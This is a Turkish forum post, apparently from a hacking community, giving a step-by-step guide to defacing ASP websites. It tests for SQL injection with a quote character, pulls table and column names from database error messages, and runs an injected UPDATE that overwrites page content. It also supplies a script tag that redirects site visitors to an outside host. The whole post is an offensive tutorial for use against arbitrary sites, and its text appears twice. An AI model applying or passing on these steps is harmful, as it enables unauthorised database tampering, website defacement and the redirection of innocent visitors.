Selam Herkese
Şimdi hazırlayacağım dökümanda asp siteleri hacklemeyi göstereceğim video hazırlıcaktım ama pcde sorun var :S
şimdi ilk olarak kendimize bir site seçelim
www.siteadı.com/news.asp?id=1
örneğin sitemiz bu olsun bunun sql injection açığı olup olmadığını adresin sonunda 'a şeklinde yazıyoruz
yani şu şekilde
www.siteadı.com/news.asp?id=1'a
Unclosed quotation mark after the character string 'a
bu uyarıyı alırsa siteye update edebiliriz
şimdi tablo ve kolon adlarını öğrenelim
www.siteadı.com/news.asp?id=1 having 1=1 yaparak tablo ve kolon adını öğreniriz
örneğin tablo adı
ew_news.ID
tablo adı:ew_news
kolon adı :ID ama ilk kolonda update olmaya bilir bizde diğer kolonu bulalım
şimdi ise sitenin sonuna
www.siteadı.com/news.asp?id=1 group by ew_news.ID
ve diğer kolon adını öğreniriz.
ew_news.title
tablo adı:ew_news
kolon adı:title
şimdi update yapalım
www.siteadı.com/news.asp?id=1 update tablo_adı set kolon_adı='yazılacak yazı';--
www.siteadı.com/news.asp?id=1 update ew_news set title='PROGENTR';--
isterseniz yönlendirebilirsiniz
koduda vereyim
<scpript>********="http://progentr.freetzi.com"</script>
buyrun
yapamayan arkadaşlar için msn adresim İletişim adresi vermek yasaktır | EmpoRe
hacker değil lamer değil hacker adayı ProgenTR tarafından hazırlanmıştır alıntı değildir alın teridir.
Selametle Kalın..
Herşey THT için ...
Şimdi hazırlayacağım dökümanda asp siteleri hacklemeyi göstereceğim video hazırlıcaktım ama pcde sorun var :S
şimdi ilk olarak kendimize bir site seçelim
www.siteadı.com/news.asp?id=1
örneğin sitemiz bu olsun bunun sql injection açığı olup olmadığını adresin sonunda 'a şeklinde yazıyoruz
yani şu şekilde
www.siteadı.com/news.asp?id=1'a
Unclosed quotation mark after the character string 'a
bu uyarıyı alırsa siteye update edebiliriz
şimdi tablo ve kolon adlarını öğrenelim
www.siteadı.com/news.asp?id=1 having 1=1 yaparak tablo ve kolon adını öğreniriz
örneğin tablo adı
ew_news.ID
tablo adı:ew_news
kolon adı :ID ama ilk kolonda update olmaya bilir bizde diğer kolonu bulalım
şimdi ise sitenin sonuna
www.siteadı.com/news.asp?id=1 group by ew_news.ID
ve diğer kolon adını öğreniriz.
ew_news.title
tablo adı:ew_news
kolon adı:title
şimdi update yapalım
www.siteadı.com/news.asp?id=1 update tablo_adı set kolon_adı='yazılacak yazı';--
www.siteadı.com/news.asp?id=1 update ew_news set title='PROGENTR';--
isterseniz yönlendirebilirsiniz
koduda vereyim
<scpript>********="http://progentr.freetzi.com"</script>
buyrun
yapamayan arkadaşlar için msn adresim İletişim adresi vermek yasaktır | EmpoRe
hacker değil lamer değil hacker adayı ProgenTR tarafından hazırlanmıştır alıntı değildir alın teridir.
Selametle Kalın..
Herşey THT için ...
Moderatör tarafında düzenlendi:
